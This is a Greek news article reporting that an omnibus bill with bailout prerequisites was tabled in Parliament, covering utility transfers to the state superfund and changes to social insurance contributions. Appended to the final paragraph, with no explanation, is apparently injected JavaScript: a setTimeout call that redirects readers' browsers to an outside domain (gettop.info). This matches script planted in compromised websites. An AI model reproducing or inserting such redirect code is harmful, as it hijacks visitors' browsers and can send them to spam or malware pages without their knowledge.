Κατατέθηκε στη Βουλή το πολυνομοσχέδιο για τα προαπαιτούμενα

0
5

 

Κατατέθηκε στη Βουλή το πολυνομοσχέδιο με τίτλο “Επείγουσες ρυθμίσεις των Υπουργείων Οικονομικών, Περιβάλλοντος και Ενέργειας, Υποδομών, Μεταφορών και Δικτύων και Εργασίας, Κοινωνικής Ασφάλισης και Κοινωνικής Αλληλεγγύης για την εφαρμογή της Συμφωνίας Δημοσιονομικών Στόχων και Διαρθρωτικών Μεταρρυθμίσεων”,το οποίο περιλαμβάνει τα εκκρεμή προαπαιτούμενα, από την πρώτη αξιολόγηση, για την εκταμίευση της δόσης των 2,8 δις ευρώ.

Η επεξεργασία και η συζήτηση του νομοθετήματος στις αρμόδιες κοινοβουλευτικές επιτροπές θα ξεκινήσει τη Δευτέρα ενώ την Τρίτη, θα εισαχθεί στην Ολομέλεια της Βουλής προς συζήτηση και ψήφιση.

Το πολυνομοσχέδιο περιλαμβάνει ένα μέρος από τα κρίσιμα προαπαιτούμενα, προκειμένου να «κλείσει» οριστικά η πρώτη αξιολόγηση.

Με βάση τις διατάξεις του πολυνομοσχεδίου, και σύμφωνα με όσα αναφέρει η Έκθεση του Γενικού Λογιστηρίου του Κράτους, προβλέπεται ότι περνούν στον έλεγχο του Υπερταμείου οι ΕΥΑΘ, ΕΥΔΑΠ, Κτιριακές Υποδομές, Αττικό Μετρό, ΔΕΗ και ΕΛΒΟ.

Ακόμη, αναπροσαρμόζεται το ύψος της έκπτωσης που παρέχεται σε περίπτωση εξαγοράς ετών ασφάλισης με εφάπαξ καταβολή στο 2% για κάθε έτος εξαγοράς (αντί του 15% επί του συνολικού ποσού που ισχύει).

Μεταξύ άλλων, στο νομοσχέδιο προβλέπεται ότι η εισφορά για την υγειονομική περίθαλψη των ασφαλισμένων στον ΟΓΑ τίθεται σε ισχύ από 1.1.2017 στο 6,95% (αντί της σταδιακής αύξησης της στο 4,73%, στο 5,84% το 2018 και στο 6,95% από 1.1.2019).

Ακόμη καταργείται η καταβολή μειωμένων εισφορών για υγειονομική περίθαλψη για τα 5 πρώτα έτη ασφάλισης των υπαγόμενων στο Ενιαίο Ταμείο Ασφάλισης Αυτοαπασχολούμενων (ΕΤΑΑ) και η δυνατότητα που είχαν να καταβάλουν τη διαφορά σε μεταγενέστερο χρόνο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here